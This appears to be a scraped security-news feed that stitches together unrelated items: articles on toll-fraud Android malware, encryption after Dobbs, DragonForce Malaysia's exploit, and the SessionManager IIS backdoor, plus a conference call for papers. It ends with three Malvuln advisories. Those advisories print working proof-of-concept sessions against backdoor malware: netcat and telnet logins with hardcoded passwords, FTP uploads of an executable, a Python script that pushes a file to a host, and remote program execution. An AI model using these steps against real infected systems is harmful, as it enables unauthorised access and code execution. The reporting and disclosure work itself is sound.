By Deeba Ahmed
Those still using older versions of the Android operating system are at risk. Microsoft’s 365 Defender team has detected a…
This is a post from HackRead.com Read the original post: Microsoft Warns of Evolving Toll Fraud Android Malware Draining Wallets

****Those still using older versions of the Android operating system are at risk.****

Microsoft’s 365 Defender team has detected a new and evolving Android malware that targets users’ crypto wallets to steal funds without raising suspicion. According to researchers; the malware hunts for devices still using older versions of Android OS.

Toll fraud falls into a billing fraud subcategory that automatically signs the user for a premium service without asking for user content. Since it is continuously evolving, researchers regard it as dangerous Android malware.

**A Novel Fraud**

The malware has a unique attack approach compared to other billing frauds such as call or SMS fraud. Where other types of scams utilize standard attack flow involving making calls or sending messages to premium numbers, toll fraud uses a complicated multi-step attack flow, which the malware developers are continually improving.

Furthermore, Microsoft explained that the malware targets “specific network operators” and performs its routines only if the device is subscribed to one of its approved network operators. And it uses cellular data for its malicious operations by default. In fact, it forces devices to connect to a mobile network even when a Wi-Fi connection is available.

**Attack Scenario**

According to the findings shared by Microsoft’s researchers, the evolving toll fraud scheme exploits the Wireless Application Protocol (WAP) billing mechanism to target Android users. For your information, applications use WAP to charge users for paid content via their mobile phone bills. But, the malware can easily enroll the user in premium services since it utilizes cellular networks to function.

The attack chain commences when the user disconnects from a Wi-Fi network and connects to a mobile network. The Android malware quickly launched the subscription page and automatically subscribed the user to the service.

Once this is done, the malware reads a one-time password (OTP), if any, and fills the required fields to finish the subscription process. The attackers then disguise this activity by disabling SMS notifications.

**Possible Dangers**

According to Microsoft’s blog post, Toll fraud poses numerous risks, including the unwanted increase in your monthly phone bill. Since the malware hides behind legitimate apps requiring a wide range of permissions, it becomes impossible to detect it. It hides behind apps requesting SMS permissions, personalization, editing access, and communication-related privileges. Such as wallpaper or lock screen apps, chat/messaging apps, fake antivirus, and cleaner and camera apps.

It must be noted that the malware targets phones running Android 9 or older versions. This means mobile phones using Android version 10 or higher are safe. Still, it is recommended to install antivirus apps for added protection and avoid installing apps from 3rd-party sources.

**More Android Malware News**

*   Play Store Apps Caught Spreading Android Malware to Millions
*   Watch out as new Android malware spreads through WhatsApp
*   Microsoft warns of new Android ransomware blackmailing victims
*   Web3 Backdoor Wallets Steals Seed Phrases from iOS/Android Phones
*   New Russian Android Malware Tracks GPS Location and Spies on Victims

Microsoft Warns of Evolving Toll Fraud Android Malware Draining Wallets

With abortion set to be criminalized in more than half the US, encryption has never been more important for protection—and civil disobedience.

a number of course-altering US Supreme Court decisions last month—including the reversal of a constitutional right to abortion and the overturning of a century-old limit on certain firearms permits—have activists and average Americans around the country anticipating the fallout for rights and privacy as abortion “trigger laws,” expanded access to concealed carry permits, and other regulations are expected to take effect in some states. And as people seeking abortions scramble to protect their digital privacy and researchers plumb the relationship between abortion speech and tech regulations, encryption proponents have a clear message: Access to end-to-end encrypted services in the US is more important than ever.

Studies, including those commissioned by tech giants like Meta, have repeatedly and definitively shown that access to encrypted communications is a human rights issue in the digital age. End-to-end encryption makes your messages, phone calls, and video chats unintelligible everywhere except on the devices involved in the conversations, so snoops and interlopers can’t access what you’re saying—and neither can the company that offers the platform. As the legal climate in the US evolves, people who once thought they had nothing to hide may realize that era is now over.

“There are plenty of people in the US for whom it has always been true that the state wasn’t really helping them and was mostly harming them,” says Riana Pfefferkorn, a research scholar at the Stanford Internet Observatory. “But for those who are now losing faith in traditional institutions of government, it provides room for them to say, ‘OK, what technologies exist for taking back some control?’”

Over the past decades, law enforcement officials around the world have increasingly marked encryption as a hindrance to investigations and, therefore, a threat. The US Department of Justice and other agencies worldwide have campaigned to undermine encryption features with backdoors or make it economically infeasible for companies to offer the protection. While it is important to prevent violence and prosecute activity like the distribution of child sexual abuse materials, researchers consistently note that criminals will deploy and use encryption to protect their data whether the tools are legal or not—as has been the case with terrorist groups like Al Qaeda and ISIS.

Moxie Marlinkspike, the cryptographer who founded the open source, end-to-end encrypted messaging service Signal, explored the question of criminality and access to secure communications in a blog post nearly 10 years ago. “Police already abuse the immense power they have, but if everyone’s _every_ action were being monitored, and everyone technically violates some obscure law at some time, then punishment becomes purely selective,” he wrote. "Those in power will essentially have what they need to punish anyone they’d like, whenever they choose.”

The potential for laws to change abruptly and completely was on display last month in the Supreme Court’s _New York State Rifle & Pistol Association v. Bruen_ decision that struck down a century-old concealed carry licensure law with implications for similar laws in other states. And _Dobbs v. Jackson Women’s Health Organization_ instantly banned abortion in many states—a move that means people around the country who were previously law-abiding may now be seeking life-or-death treatment in violation of the law. Furthermore, in restrictive states, people who aid someone who receives an abortion or who are simply close to a patient could now be subject to law enforcement surveillance and investigation, regardless of whether they are ultimately charged and prosecuted.

Meanwhile, anti-encryption initiatives in the US, including proposed legislation like the Earn It Act, continue to pit law enforcement against technical protections. Pfefferkorn is clear about the divide. “You really can’t be pro-choice and anti-encryption at this point,” she says.

Researchers point out that encryption is often thought of in the context of enabling free speech, but it can also be looked at through the lens of self-defense.

“Effective, uncensorable, secret communications are certainly far more valuable to resistance movements than small arms are,” says computer security consultant Ryan Lackey. “If you had magic, secure telepathy between everyone in your organization, in a civil war or resistance scenario where some of your allies were inside the opposition, you wouldn’t need a single gun to win.”

Lackey points out that there are parallels between encryption and firearms, as laid out in the Second Amendment, an observation that others have explored at times. The crucial element, though, is the connection to a right to self-defense, which the Supreme Court’s Second Amendment absolutists cite repeatedly as the law’s “central component.”

Beyond end-to-end encryption’s ability to protect people from their government, police, and prosecutors, it also protects them from other people who seek to enact harm, be they criminal hackers or violent extremists. While equating encryption to a weapon misconstrues its function—it’s much more shield than sword—these defenses remain the most powerful tool people everywhere have to protect their digital privacy. And a clear parallel can be drawn to the fervor with which gun advocates embrace their right to bear arms.

Stanford's Pfefferkorn points out that it is logical and necessary for abortion providers, patients, or anyone who is pro-choice to embrace and defend encryption in general, but particularly so in light of the overturning of _Roe v. Wade._ She adds that in this moment, when the Supreme Court is reversing decades of established precedent on a variety of issues at once, the most important generalizable takeaway is the benefits of access to end-to-end encryption, and the necessity of preserving that access.

“Laws can change. Social rules can change. The perfectly harmless conversation you had yesterday might come back to hurt you years from now,” says Johns Hopkins cryptographer Matthew Green. “That’s why we don’t write down every spoken conversation and keep it forever. Encryption is just a way to give digital communications the same basic protections.”

Twenty-six states have either criminalized abortion, will do so, or are likely to take that step. How those laws will be enforced remains unknown. What’s certain is that millions of people who had nothing to hide before the Supreme Court’s June 24 decision now face the prospect of potential targeting, surveillance, and even prison over their reproductive health. And comprehensive encryption will be essential to their self-defense. As Signal’s Marlinspike said during a panel discussion at the 2016 RSA security conference in San Francisco, “I actually think that law enforcement should be difficult … I think it should actually be possible to break the law.”

End-to-End Encryption's Central Role in Modern Self-Defense

Microsoft has detailed the evolving capabilities of toll fraud malware apps on Android, pointing out its "complex multi-step attack flow" and an improved mechanism to evade security analysis.
Toll fraud belongs to a category of billing fraud wherein malicious mobile applications come with hidden subscription fees, roping in unsuspecting users to premium content without their knowledge or consent

Microsoft has detailed the evolving capabilities of toll fraud malware apps on Android, pointing out its "complex multi-step attack flow" and an improved mechanism to evade security analysis.

Toll fraud belongs to a category of billing fraud wherein malicious mobile applications come with hidden subscription fees, roping in unsuspecting users to premium content without their knowledge or consent.

It's also different from other fleeceware threats in that the malicious functions are only carried out when a compromised device is connected to one of its target network operators.

"It also, by default, uses cellular connection for its activities and forces devices to connect to the mobile network even if a Wi-Fi connection is available," Dimitrios Valsamaras and Sang Shin Jung of the Microsoft 365 Defender Research Team said in an exhaustive analysis.

"Once the connection to a target network is confirmed, it stealthily initiates a fraudulent subscription and confirms it without the user's consent, in some cases even intercepting the one-time password (OTP) to do so."

Such apps are also known to suppress SMS notifications related to the subscription to prevent the victims from becoming aware of the fraudulent transaction and unsubscribing from the service.

At its core, toll fraud takes advantage of the payment method which enables consumers to subscribe to paid services from websites that support the Wireless Application Protocol (WAP). This subscription fee gets charged directly to the users' mobile phone bills, thus obviating the need for setting up a credit or debit card or entering a username and password.

"If the user connects to the internet through mobile data, the mobile network operator can identify him/her by IP address," Kaspersky noted in a 2017 report about WAP billing trojan clickers. "Mobile network operators charge users only if they are successfully identified."

Optionally, some providers can also require OTPs as a second layer of confirmation of the subscription prior to activating the service.

"In the case of toll fraud, the malware performs the subscription on behalf of the user in a way that the overall process isn't perceivable," the researchers said. "The malware will communicate with a \[command-and-control\] server to retrieve a list of offered services."

It achieves this by first turning off Wi-Fi and turning on mobile data, followed by making use of JavaScript to stealthily subscribe to the service, and intercepting and sending the OTP code (if applicable) to complete the process.

The JavaScript code, for its part, is designed to click on HTML elements that contain keywords such as "confirm," "click," and "continue" to programmatically initiate the subscription.

Upon a successful fraudulent subscription, the malware either conceals the subscription notification messages or abuses its SMS permissions to delete incoming SMS messages containing information about the subscribed service from the mobile network operator.

Toll fraud malware is also known to cloak its malicious behavior by means of dynamic code loading, a feature in Android that allows apps to pull additional modules from a remote server during runtime, making it ripe for abuse by malicious actors.

From a security standpoint, this also means that a malware author can fashion an app such that the rogue functionality is only loaded when certain prerequisites are met, effectively defeating static code analysis checks.

"If an app allows dynamic code loading and the dynamically loaded code is extracting text messages, it will be classified as a backdoor malware," Google lays out in developer documentation about potentially harmful applications (PHAs).

With an install rate of 0.022%, toll fraud apps accounted for 34.8% of all PHAs installed from the Android app marketplace in the first quarter 2022, ranking below spyware. Most of the installations originated from India, Russia, Mexico, Indonesia, and Turkey.

To mitigate the threat of toll fraud malware, it's recommended that users install applications only from the Google Play Store or other trusted sources, avoid granting excessive permissions to apps, and consider upgrading to a new device should it stop receiving software updates.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Warns About Evolving Capabilities of Toll Fraud Android Malware Apps

The hacktivist group is ramping up its activities and ready to assault governments and businesses with escalating capabilities.

The hacktivist group DragonForce Malaysia has released an exploit that allows Windows Server local privilege escalation (LPE) to grant access to local distribution router (LDR) capabilities. It also announced that it's adding ransomware attacks to its arsenal.  

The group posted a proof of concept (PoC) of the exploit on its Telegram channel on June 23, which was subsequently analyzed by CloudSEK this week. While there's no known CVE for the bug, the group claims that the exploit can be used to bypass authentication "remotely in one second" in order to access the LDR layer, which is used to interconnect local networks at various locations of an organization.

The group says it would be using the exploit in campaigns targeted at businesses operating in India, which falls directly within its wheelhouse. During the past three months, DragonForce Malaysia has launched several campaigns targeting numerous government agencies and organizations across the Middle East and Asia.

“DragonForce Malaysia is adding to a year that will long be remembered for geopolitical unrest," says Daniel Smith, head of research for Radware’s cyber threat intelligence division. "In combination with other hacktivists, the threat group has successfully filled the void left by Anonymous while remaining independent during the resurgence of hacktivists related to the Russian/Ukrainian war."

The most recent, dubbed "OpsPatuk" and launched in June, has already seen several government agencies and organizations across the country targeted by data leaks and denial-of-service attacks, with the number of defacements topping 100 websites.

“DragonForce Malaysia is expected to continue defining and launching new reactionary campaigns based on their social, political, and religious affiliations for the foreseeable future," Smith says. "The recent operations by DragonForce Malaysia ... should remind organizations worldwide that they should remain vigilant during these times and aware that threats exist outside the current cyber conflict in Eastern Europe.”

**Why LPE Should Be on the Patching Radar**

While not as flashy as remote code execution (RCE), LPE exploits provide a path from a normal user to SYSTEM, essentially the highest privilege level in the Windows environment. If exploited, LPE vulnerabilities not only allow an attacker a step in the door but also provide local admin privileges — and access to the most sensitive data on the network.

With this heightened level of access, attackers can make system modifications, recover credentials from stored services, or recover credentials from other users who are using or have authenticated to that system. Recovering other users' credentials can allow an attacker to impersonate those users, providing paths for lateral movement on a network.

With escalated privileges, an attacker can also perform admin tasks, execute malware, steal data, execute a backdoor to gain persistent access, and much more.

Darshit Ashara, principal threat researcher for CloudSEK, offers one sample attack scenario.

“The attacker from the team can easily exploit any simple Web application-based vulnerability to gain aninitial foothold and place a Web-based backdoor,” Ashara says. “Usually, the machine on which Web server is hosted will have user privilege. That is where the LPE exploit will enable the threat actor to gain higher privileges and compromise not only a single website but other websites hosted on the server.”

**LPE Exploits often Remain Unpatched**

Tim McGuffin, director of adversarial engineering at LARES Consulting, an information-security consulting firm, explains that most organizations wait to patch LPE exploits because they typically require initial access to the network or endpoint in the first place.

“A lot of effort is placed on the initial prevention of access, but the further you move into the attack chain, the lesser effort is placed on tactics like privilege escalation, lateral movement, and persistence,” he says. “These patches are typically prioritized and patched on a quarterly basis and do not use an emergency 'patch now' process.”

Nicole Hoffman, senior cyber threat intelligence analyst at Digital Shadows, notes that the importance of every vulnerability is different, whether it's LPE or RCE.

“Not all vulnerabilities can be exploited, meaning not every vulnerability requires immediate attention. It is a case-by-case basis,” she says. “Several LPE vulnerabilities have other dependencies, such as needing a username and password to carry out the attack. That's not impossible to obtain but requires a higher level of sophistication.”

Many organizations also create local admin accounts for individual users, so they can carry out everyday IT functions such as installing their own software on their own machines, Hoffman adds.

“If many users have local admin privileges, it is more difficult to detect malicious local admin actions in a network,” she says. “It would be easy for an attacker to blend into normal operations due to poor security practices that are widely used.”

Any time an exploit is released into the wild, she explains, it doesn't take long before cybercriminals with varying levels of sophistication take advantage and perform opportunistic attacks.

“An exploit takes out some of this legwork,” she notes. “It is realistically possible mass scanning is already taking place for this vulnerability.”

Hoffman adds that vertical privilege escalation requires more sophistication and is typically more in line with advanced persistent threat (APT) methodologies.

**DragonForce Plans Shift to Ransomware**

In a video and through social-media channels, the hacktivist group also announced its plans to start conducting mass ransomware attacks. Researchers say this could be an adjunct to its hacktivist activities rather than a departure.

“DragonForce mentioned carrying out widespread ransomware attacks leveraging the exploit they created,” Hoffman explains. “The WannaCry ransomware attack was a great example of how widespread ransomware attacks all at the same time are challenging if financial gain is the end goal.”

She also points out that it is not uncommon to see these announcements from cybercriminal threat groups, as it draws attention to the group.

From the perspective of McGuffin, however, the public announcement of a shift in tactics is “a curiosity,” especially for a hacktivist group.

“Their motives may be more around destruction and denial of service and less around making a profit like typical ransomware groups, but they may be using the funding to enhance their hacktivist capabilities or awareness of their cause,” he says.

Ashara agrees that DragonForce’s planned shift is worth highlighting, as the group’s motive is to cause as much of an impact as possible, boost their ideology, and spread their message.

“Hence, the group's motivation with the announcement of ransomware is not for financial cause but to cause damage,” he says. “We have seen similar wiper malwares in the past where they would use ransomware and pretend the motivation is financial, but the root motivation is damage.”

DragonForce Malaysia Releases LPE Exploit, Threatens Ransomware

The call for papers for Hardwear.io NL 2022 is now open. It will take place October 27th through the 28th, 2021 in the Netherlands.

    *🐞 CFP for Hardwear.io NL 2022 is OPEN!*If you have groundbreaking embedded research or an awesome open-source toolyou’d like to showcase before the global hardware security community, thisis your chance. Send in your ideas on various hardware subjects, includingbut not limited to Chips, Processors, ICS/SCADA, Telecom, Protocols &Cryptography.CFP is open until: 15 August 2022Conference: 27-28 October 2022, The Hague (NL)✅ SUBMIT your research: https://hardwear.io/netherlands-2022/cfp.php➡️ Suggested Topics:Smart cards: identification, access controls, pay-TVIoT devices: automotive, medical, mobile payment, mobile-connected devicesTrusted computing: mobile TPM, Trusted Execution EnvironmentsEmbedded systems: Firmware, operating systems, memory, virtual machinesTrojans and backdoors: Counterfeit Detection and preventionAttacks and countermeasures:Side-channel, Fault Injection, EMFI, Tempest attacks and countermeasuresReverse engineering, (anti-)cloning, (anti-)tampering, (anti-)counterfeiting➡️ Questions? cfp@hardwear.ioWe look forward to seeing you at Hardwear.io NL 2022. Good luck!Team Hardwear.io <http://hardwear.io/>

Hardwear.io NL 2022 Call For Papers

A newly discovered malware has been put to use in the wild at least since March 2021 to backdoor Microsoft Exchange servers belonging to a wide range of entities worldwide, with infections lingering in 20 organizations as of June 2022.
Dubbed SessionManager, the malicious tool masquerades as a module for Internet Information Services (IIS), a web server software for Windows systems, after

A newly discovered malware has been put to use in the wild at least since March 2021 to backdoor Microsoft Exchange servers belonging to a wide range of entities worldwide, with infections lingering in 20 organizations as of June 2022.

Dubbed **SessionManager**, the malicious tool masquerades as a module for Internet Information Services (IIS), a web server software for Windows systems, after exploiting one of the ProxyLogon flaws within Exchange servers.

Targets included 24 distinct NGOs, government, military, and industrial organizations spanning Africa, South America, Asia, Europe, Russia and the Middle East. A total of 34 servers have been compromised by a SessionManager variant to date.

This is far from the first time the technique has been observed in real-world attacks. The use of a rogue IIS module as a means to distribute stealthy implants mirrors the tactics of a credential stealer called Owowa that came to light in December 2021.

"Dropping an IIS module as a backdoor enables threat actors to maintain persistent, update-resistant and relatively stealthy access to the IT infrastructure of a targeted organization; be it to collect emails, update further malicious access, or clandestinely manage compromised servers that can be leveraged as malicious infrastructure," Kaspersky researcher Pierre Delcher said.

The Russian cybersecurity firm attributed the intrusions with medium-to-high confidence to an adversary tracked as Gelsemium, citing overlaps in the malware samples linked to the two groups and victims targeted.

ProxyLogon, since its disclosure in March 2021, has attracted the repeated attention of several threat actors, and the latest attack chain is no exception, with the Gelsemium crew exploiting the flaws to drop SessionManager, a backdoor coded in C++ and is engineered to process HTTP requests sent to the server.

"Such malicious modules usually expect seemingly legitimate but specifically crafted HTTP requests from their operators, trigger actions based on the operators' hidden instructions if any, then transparently pass the request to the server for it to be processed just like any other request," Delcher explained.

Said to be a "lightweight persistent initial access backdoor," SessionManager comes with capabilities to read, write, and delete arbitrary files; execute binaries from the server; and establish communications with other endpoints in the network.

The malware further acts as a covert channel to conduct reconnaissance, gather in-memory passwords, and deliver additional tools such as Mimikatz as well as a memory dump utility from Avast.

The findings come as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) urged government agencies and private sector entities using the Exchange platform to switch from the legacy Basic Authentication method to Modern Authentication alternatives prior to its deprecation on October 1, 2022.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

New 'SessionManager' Backdoor Targeting Microsoft IIS Servers in the Wild

Malicious ISS module exploitation is the latest trend among threat actors targeting Exchange servers, analysts say.

Attackers once focused on exploiting ProxyLogon Microsoft Exchange server vulnerabilities have made a pivot to the new SessionManager backdoor, which can be used to gain persistent, undetected access to emails -- and even take over the target organization's infrastructure. 

Researchers from Kaspersky today report the emergence of SessionManager, which they say is part of a bigger trend of attackers deploying malicious backdoor modules inside Internet Information Services (ISS) servers for Windows, like Exchange servers.   

The malicious SessionManager backdoor, first observed in March 2021, has been used to target nongovernmental organizations (NGOs) across Africa, Europe, the Middle East, and South Asia, the researchers add. The Kaspersky report says 34 servers across 24 individual NGOs have been compromised by SessionManager. 

"The exploitation of Exchange server vulnerabilities has been a favorite of cybercriminals looking to get into targeted infrastructure since Q1 2021," said Pierre Delcher, senior security researcher at Kaspersky, in a post about the findings. "The recently discovered SessionManager was poorly detected for a year and is still deployed in the wild."

The Kaspersky team recommends regular threat hunting for malicious modules in exposed ISS servers and focusing detection on lateral movement across the network, as well as close monitoring of data exfiltration to the Internet. 

"In the case of Exchange servers, we cannot stress it enough: The past year’s vulnerabilities have made them perfect targets, whatever the malicious intent, so they should be carefully audited and monitored for hidden implants, if they were not already,” Delcher warned.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Exchange Servers Backdoored Globally by SessionManager

Backdoor.Win32.Coredoor.10.a malware suffers from an authentication bypass vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/49da40a2ac819103da9dc5ed10d08ddb.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Coredoor.10.aVulnerability: Authentication BypassDescription: The malware runs an FTP server on TCP port 21000. Third-party attackers who can reach infected systems can logon using any username/password combination. Intruders may then upload executables using ftp PASV, STOR commands, this can result in remote code execution.Family: CoredoorType: PE32MD5: 49da40a2ac819103da9dc5ed10d08ddbVuln ID: MVID-2022-0618Dropped files: CFS.EXE  Disclosure: 06/29/2022Exploit/PoC:C:\>nc64.exe 192.168.18.125 21000220 c400s FTP Server read...USER malvuln331 Password required for malvuln.PASS malvuln230 User malvuln logged in.SYST215 UNIX Type: L8 Internet Component SuitePASV227 Entering Passive Mode (192,168,18,125,194,224).STOR DOOM.exe150 Opening data connection for DOOM.exe.426 Connection closed; Cannot create file C:\temp\DOOM.exe.CWD \Users250 CWD command successful. "C:/Users/" is current directory.PASV227 Entering Passive Mode (192,168,18,125,195,94).STOR DOOM.exe150 Opening data connection for DOOM.exe.226 File received okfrom socket import *MALWARE_HOST="192.168.18.125"PORT=50014DOOM="DOOM.exe"def doit():    s=socket(AF_INET, SOCK_STREAM)    s.connect((MALWARE_HOST, PORT))    f = open(DOOM, "rb")    EXE = f.read()    s.send(EXE)    while EXE:        s.send(EXE)        EXE=f.read()    s.close()    print("By Malvuln");if __name__=="__main__":    doit()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Coredoor.10.a MVID-2022-0618 Authentication Bypass

Backdoor.Win32.EvilGoat.b malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/20daf01e941f966b21a7ae431faefc65.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.EvilGoat.bVulnerability: Weak Hardcoded CredentialsDescription: The malware listens on TCP port 13014. Authentication is required, however the credentials "evilgoat / penix" are weak and found within the PE file.Family: EvilGoatType: PE32MD5: 20daf01e941f966b21a7ae431faefc65Vuln ID: MVID-2022-0619Dropped files: ftpsvr.exeDisclosure: 06/29/2022Exploit/PoC:telnet.exe x.x.x.x 13014220 FTP ServerUSER evilgoat331 Password required for evilgoat.PASS penix230 User evilgoat logged in.SYST500 'SYST': command not understood.PASV227 Entering Passive Mode (192,168,18,125,236,209)CDUP \250 CWD command successful.STOR DOOM.exe150 Opening BINARY mode data connection for file transfer.226 Upload Complete, 25602 bytes sent.from socket import *MALWARE_HOST="192.168.18.125"PORT=60625DOOM="DOOM.exe"def doit():    s=socket(AF_INET, SOCK_STREAM)    s.connect((MALWARE_HOST, PORT))    f = open(DOOM, "rb")    EXE = f.read()    s.send(EXE)    while EXE:        s.send(EXE)        EXE=f.read()    s.close()    print("By Malvuln");if __name__=="__main__":    doit()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.EvilGoat.b MVID-2022-0619 Hardcoded Credential

Backdoor.Win32.Cafeini.b malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/a8fc1b3f7a605dc06a319bf0e14ca68b.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Cafeini.bVulnerability: Weak Hardcoded CredentialsDescription: The malware listens on TCP ports 51966 and 23. Authentication is required, however the password "mama" is weak and found within the PE file. Moreover, the FTP server running on non standard port 23 also uses same password. Trying to execute a program incorrectly you get reply like, "STATUS I can't run program", as it requires the full path to the file to execute.Family: CafeiniType: PE32MD5: a8fc1b3f7a605dc06a319bf0e14ca68bVuln ID: MVID-2022-0617Disclosure: 06/29/2022Exploit/PoC:C:\>nc64.exe x.x.x.x 51966CAFEiNi 1.1Enter your password:mamaC:\Users\victim\Desktop>whoamiwhoamiSTATUS: unknown command "WHOAMI"C:\Users\victim\Desktop>exec c:\Windows\system32\calc.exeexec c:\Windows\system32\calc.exeSTATUS: program runnedC:\Users\victim\Desktop>Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Tag

#backdoor